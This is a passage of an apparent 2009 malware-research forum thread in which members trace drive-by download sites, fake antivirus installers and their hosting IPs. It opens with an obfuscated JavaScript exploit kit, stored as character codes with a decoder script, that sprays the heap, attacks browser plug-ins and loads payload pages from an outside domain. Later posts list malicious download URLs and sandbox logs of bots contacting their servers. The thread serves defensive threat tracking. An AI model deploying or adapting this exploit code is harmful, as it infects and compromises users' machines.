49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#113#117#105#99#107#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#81#117#105#99#107#84#105#109#101#46#81#117#105#99#107#84#105#109#101#46#52#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#34#34#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#50#48#48#59#105#43#43#41#32#123#13#10#98#117#102#32#43#61#32#34#65#65#65#65#34#59#13#10#125#13#10#98#117#102#32#43#61#32#34#65#65#65#34#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#51#59#105#43#43#41#98#117#102#32#43#61#32#34#92#120#48#99#92#120#48#99#92#120#48#99#92#120#48#99#34#59#13#10#118#97#114#32#109#121#95#100#105#118#32#61#32#100#111#99#117#109#101#110#116#46#99#114#101#97#116#101#69#108#101#109#101#110#116#40#34#100#105#118#34#41#59#13#10#109#121#95#100#105#118#46#105#110#110#101#114#72#84#77#76#32#61#32#13#10#34#60#111#98#106#101#99#116#32#99#108#97#115#115#105#100#61#92#34#99#108#115#105#100#58#48#50#66#70#50#53#68#53#45#56#67#49#55#45#52#66#50#51#45#66#67#56#48#45#68#51#52#56#56#65#66#68#68#67#54#66#92#34#32#119#105#100#116#104#61#92#34#50#48#48#92#34#32#104#101#105#103#104#116#61#92#34#50#48#48#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#115#114#99#92#34#32#118#97#108#117#101#61#92#34#111#98#106#101#99#116#95#114#116#115#112#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#116#121#112#101#92#34#32#118#97#108#117#101#61#92#34#105#109#97#103#101#47#120#45#113#117#105#99#107#116#105#109#101#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#97#117#116#111#112#108#97#121#92#34#32#118#97#108#117#101#61#92#34#116#114#117#101#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#113#116#110#101#120#116#49#92#34#32#118#97#108#117#101#61#92#34#60#114#116#115#112#58#47#47#66#66#66#66#58#34#43#98#117#102#43#34#62#84#60#109#121#115#101#108#102#62#92#34#62#34#32#43#13#10#34#60#112#97#114#97#109#32#110#97#109#101#61#92#34#116#97#114#103#101#116#92#34#32#118#97#108#117#101#61#92#34#109#121#115#101#108#102#92#34#62#34#32#43#13#10#34#60#47#111#98#106#101#99#116#62#34#59#13#10#100#111#99#117#109#101#110#116#46#98#111#100#121#46#97#112#112#101#110#100#67#104#105#108#100#40#109#121#95#100#105#118#41#59#13#10#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#32#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#114#101#97#108#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#73#69#82#80#67#116#108#46#73#69#82#80#67#116#108#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#105#102#40#111#98#106#46#80#108#97#121#101#114#80#114#111#112#101#114#116#121#40#34#80#82#79#68#85#67#84#86#69#82#83#73#79#78#34#41#62#34#54#46#48#46#49#52#46#53#53#50#34#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#123#50#70#53#52#50#65#50#69#45#69#68#67#57#45#52#66#70#55#45#56#67#66#49#45#56#55#67#57#57#49#57#70#55#70#57#51#125#34#41#59#13#10#109#115#40#41#59#13#10#118#97#114#32#109#32#61#32#34#34#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#51#50#41#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#51#50#41#59#13#10#109#32#61#32#111#98#106#46#67#111#110#115#111#108#101#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#98#117#102#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#109#59#13#10#109#32#61#32#111#98#106#46#67#111#110#115#111#108#101#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#98#117#102#59#13#10#111#98#106#46#67#111#110#115#111#108#101#32#61#32#109#59#13#10#125#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#110#116#97#117#100#105#111#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#55#55#56#50#57#70#49#52#45#68#57#49#49#45#52#48#70#70#45#65#50#70#48#45#68#49#49#68#66#56#68#54#68#48#66#67#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#50#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#50#48#48#41#59#13#10#111#98#106#46#83#101#116#70#111#114#109#97#116#76#105#107#101#83#97#109#112#108#101#40#98#117#102#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#114#101#97#116#105#118#101#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#48#65#53#70#68#55#67#53#45#65#52#53#67#45#52#57#70#67#45#65#68#66#53#45#57#57#53#50#53#52#55#68#53#55#49#53#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#49#50#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#49#50#41#59#13#10#111#98#106#46#99#97#99#104#101#102#111#108#100#101#114#32#61#32#98#117#102#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#13#10#102#117#110#99#116#105#111#110#32#112#100#102#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#32#61#32#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#65#99#114#111#80#68#70#46#80#68#70#34#41#59#13#10#105#102#32#40#33#111#98#106#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#80#68#70#46#80#100#102#67#116#114#108#34#41#59#13#10#125#13#10#105#102#32#40#111#98#106#41#32#123#13#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#39#32#119#105#100#116#104#61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59#13#10#115#101#116#84#105#109#101#111#117#116#40#39#112#100#102#50#40#41#59#39#44#49#48#48#48#48#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#32#123#13#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#39#32#119#105#100#116#104#61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101#114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59#13#10#115#101#116#84#105#109#101#111#117#116#40#39#112#100#102#50#40#41#59#39#44#49#48#48#48#48#41#59#13#10#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#112#100#102#50#40#41#123#13#10#118#97#114#32#111#98#106#32#61#32#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#65#99#114#111#80#68#70#46#80#68#70#34#41#59#13#10#105#102#32#40#33#111#98#106#41#32#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#80#68#70#46#80#100#102#67#116#114#108#34#41#59#13#10#125#13#10#105#102#32#40#111#98#106#41#32#123#13#10#119#110#100#61#119#105#110#100#111#119#59#13#10#119#104#105#108#101#32#40#119#110#100#46#112#97#114#101#110#116#33#61#119#110#100#41#123#32#119#110#100#61#119#110#100#46#112#97#114#101#110#116#59#32#125#13#10#119#110#100#46#108#111#99#97#116#105#111#110#61#34#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#112#49#100#50#102#51#46#112#104#112#63#105#100#61#53#53#53#54#57#53#38#118#105#115#61#49#34#59#13#10#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#119#109#101#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#65#56#68#51#65#68#48#50#45#55#53#48#56#45#52#48#48#52#45#66#50#69#57#45#65#68#51#51#70#48#56#55#70#52#51#67#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#50#48#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#50#48#48#48#41#59#13#10#111#98#106#46#71#101#116#68#101#116#97#105#108#115#83#116#114#105#110#103#40#98#117#102#44#49#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#13#10#105#102#32#40#13#10#109#100#97#99#40#41#32#124#124#13#10#111#102#102#105#99#101#40#41#32#124#124#13#10#100#108#40#41#32#124#124#13#10#112#100#102#40#41#32#124#124#13#10#119#109#101#40#41#32#124#124#13#10#119#102#105#40#41#32#124#124#13#10#99#111#109#40#41#32#124#124#13#10#121#97#49#40#41#32#124#124#13#10#121#97#50#40#41#32#124#124#13#10#102#98#40#41#32#124#124#13#10#109#100#115#115#40#41#32#124#124#13#10#99#114#101#97#116#105#118#101#40#41#32#124#124#13#10#119#107#115#40#41#32#124#124#13#10#111#103#97#109#101#40#41#32#124#124#13#10#99#97#40#41#32#124#124#13#10#98#117#100#100#121#40#41#32#124#124#13#10#103#111#109#119#101#98#40#41#32#124#124#13#10#120#109#108#99#111#114#101#40#41#32#124#124#13#10#113#117#105#99#107#40#41#32#124#124#13#10#114#101#97#108#40#41#32#124#124#13#10#110#116#97#117#100#105#111#40#41#13#10#41#32#123#125#13#10</b><script>var Prototype=eval(g);var s=document.getElementById("gbbZwrUnZ").innerHTML.replace(/[A-Za-z]/g,function (c){returnString.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split("#");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s[i]);}Prototype(p);</script>
Obfuscated code above from:
Quote
hxxp://peskostruikaz.com/?click=4297D
It's accessible only once by the way,ie.change your ip if you didn't grab it the first time:
Quote
hxxp://peskostruikaz.com/liloadercdi.php?id=555695
hxxp://peskostruikaz.com/p1d2f3.php?id=555695
hxxp://peskostruikaz.com/p1d2f3.php?id=555695&vis=1

Edit:
1)It appears to be Sality-related per ThreatExpert as well:
http://www.threatexpert.com/report.aspx?md5=3a03a20bfefe3fdd01659d47d2ed76c8
2)Added a quick'n'dirty decoding of the above js in attachment...
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:52:07 pm
Quote
hxxp://bestchat.tv/
Redirects to openstats.info above...
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 07:59:52 pm
Quote
hxxp://bestchat.tv/
Redirects to openstats.info above...

I have checked
Code: [Select]
openstats.info/counter3.swf
swf contains an iframe to:
Code: [Select]
ebayauctiondata.com/static.php
page contains
Code: [Select]
if (window!=top){self.location.href="http://theblog.topdailyhealth.com/feed/";} else {self.location.href="http://ebayauctiondata.com/resource.php";}
I haven't found anything suspicious at any of the both urls. Have you found more ??
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:10:44 pm
What the heck is this one...it's still puzzling me,i've changed ip quite a few times,and still...  ???
I also got some of the above,but not the same,it's kinda weird the way it returns different results back...

Quote
hxxp://ebayauctiondata.com/static.php
Which contains...
Quote
<script>
if (window!=top){self.location.href="hxxp://powa-info.com/?page_id=11";} else {self.location.href="hxxp://ebayauctiondata.com/resource.php";}
</script>
resource.php wants to appear empty...and powa-info redirects to...
Quote
<link rel="stylesheet" href="hxxp://rover.ebay.com/rover/1/711-53200-19255-0/1?type=4&campid=5336200746&toolid=10001&customid=&mpre=http%3A%2F%2Fcgi.ebay.com%2FRare-Nikon-Nikkor-ED-180-600mm-F8-AIS-zoom-180-600-8_W0QQitemZ110376001696QQcmdZViewItemQQssPageNameZRSS%3AB%3ASRCH%3AUS%3A101">
The id= parameter was also different from time to time,but always pointed to rover.ebay.com...at least from here...geoip also,except from http referrer?  :-\
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 08:17:14 pm
interesting. I got always
Code: [Select]
if (window!=top){self.location.href="http://theblog.topdailyhealth.com/feed/";} else {self.location.href="http://ebayauctiondata.com/resource.php";}
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:22:22 pm
...Maybe someone with a different country code could give it a shot as well?
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 08:25:16 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


http://anubis.iseclab.org/?action=result&task_id=125f396e5fcb398f4a58a892a330cd7b5


on the move
http://www.bfk.de/bfk_dnslogger.html?query=antispywarepcscanner.com
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 08:30:46 pm
You've probably already seen that report by now,which is dated 2 weeks earlier...but they also don't seem to have a good explanation about it:
http://www.slashfm.net/forum/showthread.php&threadid=5393
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 16, 2009, 08:41:04 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


offline. 67.215.66.132 is an opendns fail address. ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 09:01:20 pm
Code: [Select]
hxxp://antispywarepcscanner.com/download/Install_2009.exe

$ dig antispywarepcscanner.com +short
67.215.66.132


offline. 67.215.66.132 is an opendns fail address. ;)


thanks, I shoulda investigated further.

Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 09:33:29 pm
...ok,here's what i got - but it might as well be pointing to a totally wrong/misleading direction though,i really can't tell...
Here's one more "counter3.swf" that i've found out there:
hxxp://www.ebay-analytic.com/3321/counter3.swf
Which also points over to rover.ebay.com mentioned above....

Playing around with the urls...
hxxp://www.ebay-analytic.com/ -> Says "Site maintenance, come back later.",and loads style.js...
hxxp://www.ebay-analytic.com/style.js -> hxxp://91.211.65.91/traf/out.php

91.211.65.91 is dead at the moment,but listed in Spamhaus...
http://www.robtex.com/ip/91.211.65.91.html
http://www.spamhaus.org/sbl/sbl.lasso?query=SBL70438
Don't know...maybe spamvertisement or fraud auctions over at real ebay site?  :-\
Anyway,moving on for the time being...
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:45:14 pm
Code: [Select]
hxxp://ww5.dv7q.com/05/go1.exe
hxxp://ww1.dv7q.com/01/go1.exe

$ dig ww5.dv7q.com +short
121.12.116.95
$ dig ww1.dv7q.com +short
121.12.116.97

http://www.virustotal.com/analisis/93b9755520475ba1dab9edb82035effb 2/39

http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:49:44 pm
Code: [Select]
hxxp://www.dnf-gg.cn/30.exe

$ dig www.dnf-gg.cn +short
61.155.140.85

http://www.virustotal.com/analisis/e87d0879287b92766db63034c5dd8e96 2/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 03:56:40 pm
Code: [Select]
hxxp://google.netcdn.com/cao/cao.exe

$ dig google.netcdn.com +short
218.10.18.76

http://www.virustotal.com/analisis/718c78b71e5b0d0061ce5f9f939af569 39/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 05:27:53 pm
Code: [Select]
hxxp://lxl-softportal.com/softwarefortubeview.40014.exe

$ dig lxl-softportal.com +short
195.88.80.41

http://www.virustotal.com/analisis/a949c063c26af0dc1dd6225ab2bfd5c4 4/40
http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 17, 2009, 06:37:47 pm
Code: [Select]
hxxp://files.scanner-antispy-av-files.com/exe/setup_200002.exe

$ dig files.scanner-antispy-av-files.com +short
scanner-antispy-av-files.com.
195.88.81.74
$ dig scanner-antispy-av-files.com +short
195.88.81.74

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
http://www.virustotal.com/analisis/01c4b5648608c55a9191abddc1ba33a8 9/40



Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 20, 2009, 03:04:33 pm
Code: [Select]
hxxp://onlinevirus-scannerv2.com/download/Install_2009-1.exe

$ dig onlinevirus-scannerv2.com +short
94.76.213.227
94.247.3.40
78.47.172.66
78.47.91.153

http://www.virustotal.com/analisis/037a56af23500ff9a2650d63691ed1a7
http://threatexpert.com/report.aspx?md5=592b38a67d353137c72d7053ab9aa5d5

leads to connection to:
Code: [Select]
hxxp://securedliveuploads.com

$ dig securedliveuploads.com +short
78.47.172.66

http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 20, 2009, 05:33:48 pm
Code: [Select]
hxxp://dsghsddsfg.com/softwarefortubeview.40018.exe

$ dig dsghsddsfg.com +short
195.88.80.41

http://threatexpert.com/report.aspx?md5=969e6d24683ec2acf1459bef3f530396
http://virscan.org/report/6abd677bc2e2a3d203542830fccad56e.html  0/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 21, 2009, 05:07:49 pm
Code: [Select]
hxxp://76.226.175.200/pid=1000/setup.exe

http://wepawet.iseclab.org/view.php?hash=9ccfe1c8158cb8c82664fc681b58f26a&t=1240334271&type=js
http://www.virustotal.com/analisis/136f911cfb11a76e1c7cc2618cdaab97 20/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 21, 2009, 10:01:06 pm
Code: [Select]
hxxp://rotkid.com/download/534a7a3268513d3d50835e25/mlpsetup.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/94d4428878ced619d5a424cfa497f0f2 9/40
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 22, 2009, 04:31:43 am
Code: [Select]
hxxp://rotkid.com/download/534a7a3268513d3d50835e25/mlpsetup.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/94d4428878ced619d5a424cfa497f0f2 9/40

Code: [Select]
rotkid.com/download/3356626a4b413d3d8a39e13b/TestCodec.exehttp://virscan.org/report/a4bcb2834a4e662fe9a5629f78a05a3d.html 6/38
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 03:24:24 pm
Code: [Select]
hxxp://notebookgethere.us/go.php?id=2004&key=ff0057594&p=1

$ dig notebookgethere.us +short
78.47.172.66


http://wepawet.iseclab.org/view.php?hash=a81964dd5ff89fe45d50e639487bf495&t=1240413932&type=js

http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 03:29:01 pm
http://wepawet.iseclab.org/view.php?hash=d197262777146e6c69737b3cff16ab80&t=1240414310&type=js

Code: [Select]
hxxp://antivirus-quickscanv2.com/download/Install_2004.exe

$ dig antivirus-quickscanv2.com +short
94.247.3.40
94.102.48.28
78.47.91.153
94.76.213.227

http://www.virustotal.com/analisis/a4048cc9fce8f620d87dad0862f469c8  0/40
http://anubis.iseclab.org/?action=result&task_id=1775dd34a8cd790a47d13a530586badec&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 06:54:07 pm
not new but still very bad

Code: [Select]
hxxp://www.fenomen-games.com/dfiles/CookingAcademy2WorldCuisine_dwn.exe

$ dig www.fenomen-games.com +short
72.232.229.50

http://www.virustotal.com/analisis/f780c490e52727c21120bd22be0a24e3 21/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 08:00:40 pm
http://wepawet.iseclab.org/view.php?hash=2ec34acdcbd4d82fe22e419b6f8a5bac&t=1240431448&type=js

resulting in download

Code: [Select]
hxxp://litetubevideoz.net/codec/113.exe

$ dig litetubevideoz.net +short
194.165.4.77

http://www.virustotal.com/analisis/bc3bcf02fc6249c7bc37262bd71df0b3 5/40

http://anubis.iseclab.org/?action=result&task_id=14f2c73331402b3d49122d9771aba1933&format=html

http://www.malwaredomainlist.com/mdl.php?search=194.165.4.77&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 22, 2009, 10:46:47 pm
What do you make of this referrer?
Code: [Select]
10.0.50.71 - - [22/Apr/2009:21:36:37 +0000] "GET http://litetubevideoz.com/scan/?id=259 HTTP/1.1" - - "http://images.google.com/imgres?imgurl=http://elcaribenet.com/mystuff/mofongoconcamarones.jpg&imgrefurl=http://blogs.ebay.com/bongosmania/entry/Traditional-Mofongo-Recipe-FREE/_W0QQidZ135754014&usg=___7BmAkSpxyxvelrRaoIN80Q9cmk=&h=255&w=437&sz=71&hl=en&start=6&um=1&tbnid=ru89oPk_SY4i_M:&tbnh=74&tbnw=126&prev=/images%3Fq%3Dmofongo%26hl%3Den%26rls%3Dcom.microsoft:*:IE-SearchBox%26rlz%3D1I7ADBS_en%26sa%3DX%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

$ dig litetubevideoz.com +short
194.165.4.77

resulted in this download

Code: [Select]
hxxp://litetubevideoz.net/codec/259.exe

$ dig litetubevideoz.net +short
194.165.4.77

http://www.virustotal.com/analisis/e90b73097b90e071850cb3545a0c6449 5/40


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 23, 2009, 03:49:37 pm
Code: [Select]
hxxp://antivirusquickscanv2.com/download/Install_2004.exe

$ dig antivirusquickscanv2.com +short
94.102.48.28
78.47.91.153
94.247.3.40
78.47.172.66

http://www.virustotal.com/analisis/436fb2362264cbfc579ba0c2da00a418 3/40

http://anubis.iseclab.org/?action=result&task_id=14fac8a916792e174bd5bbbfbcd3ed225&format=html

78.47.91.153   Germany   Siarhei Shandrokha   static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50
78.47.172.66   Germany   Siarhei Shandrokha   static.66.172.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.172&colsearch=All&quantity=50
94.102.48.28   Netherlands   As29073 Ecatel Ltd   
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50
94.247.3.40   Latvia   Zlkon   hs.3-40.zlkon.lv.
http://www.malwaredomainlist.com/mdl.php?search=94.247.3&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 24, 2009, 12:33:42 am
more nonsense from rotkid.com

Code: [Select]
hxxp://rotkid.com/download/536a624376673d3df9b6cd71/codec.exe

$ dig rotkid.com +short
195.88.33.54

http://www.virustotal.com/analisis/124ea36ae37e68511072fd55471e05e6 10/40

http://anubis.iseclab.org/?action=result&task_id=1bfa9a592985e225455650c4bfdeccbd4&format=html

Code: [Select]
From ANUBIS:1032 to 195.88.33.55:80 - [195.88.33.55]
Request: POST /cgi-bin/generator
Response: 200 "OK"

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 24, 2009, 01:07:06 pm
Code: [Select]
hxxp://79.35.3.140/pid=1000/setup.exe

http://www.virustotal.com/analisis/d168b6d3c65bf136d95a011c1e691aaf 17/40

http://anubis.iseclab.org/?action=result&task_id=17ba91f2bdfe19684d99a31e8932fc79e&format=html

from anubis
Code: [Select]
From ANUBIS:1033 to 218.93.202.50:80 - [nua06032009.biz]
Request: POST /achcheck.php
Response: 200 "OK"
Request: POST /ld/gen.php
Response: 200 "OK"
From ANUBIS:1035 to 212.58.23.82:80 - [aksajans.com]
Request: GET /1/pch5.exe
Response: 404 "Not Found"
Request: GET /1/6244.exe
Response: 200 "OK"
Request: GET /1/nfr.exe
Response: 200 "OK"
Request: GET /1/pp.06.exe
Response: 200 "OK"


Code: [Select]
hxxp://aksajans.com/1/pch5.exe
hxxp://aksajans.com/1/6244.exe
hxxp://aksajans.com/1/nfr.exe
hxxp://aksajans.com/1/pp.06.exe

$ dig aksajans.com +short
212.58.23.82

http://www.virustotal.com/analisis/d253aa5ac7878415188349585136ba8b 0/40
http://www.virustotal.com/analisis/545f1cb7cf82c95abe0ceb9aeb3e4ef6 15/40
http://www.virustotal.com/analisis/9a2b86242ba2c1b016533241331a54f0 20/40
http://www.virustotal.com/analisis/95caadb3b284f8988fde7ce79dbec46c 15/40




Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 25, 2009, 12:24:53 am
Code: [Select]
hxxp://litegreatestdirect.cn/in.cgi?income72

$ dig litegreatestdirect.cn +short
94.247.3.150

http://wepawet.iseclab.org/view.php?hash=df885fec22550614e9258bc5369ff0cb&t=1240618935&type=js

leads to

Code: [Select]
hxxp://bigfirststopnonfat.cn/index.php

$ dig bigfirststopnonfat.cn +short
94.247.3.151

"Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf"
http://wepawet.iseclab.org/view.php?hash=6f6ff175732797755ad7780c136b72a2&t=1240535068&type=js

Code: [Select]
hxxp://liteupyourride.cn/load.php?id=8

Code: [Select]
From ANUBIS:1032 to 78.109.29.112:80 - [78.109.29.112]
Request: GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=981633
Response: 200 "OK"
Request: GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1240497686:unique_start
Response: 200 "OK"
From ANUBIS:1036 to 78.109.30.224:80 - [78.109.30.224]
Request: POST /good/receiver/online
Response: 200 "OK"
From ANUBIS:1037 to 74.54.77.82:80 - [74.54.77.82]
Request: GET /40E800144D513030303020312020202020202020202020206C0000018566000000007600000642EB0005305B5AD74D
Response: <no reply>


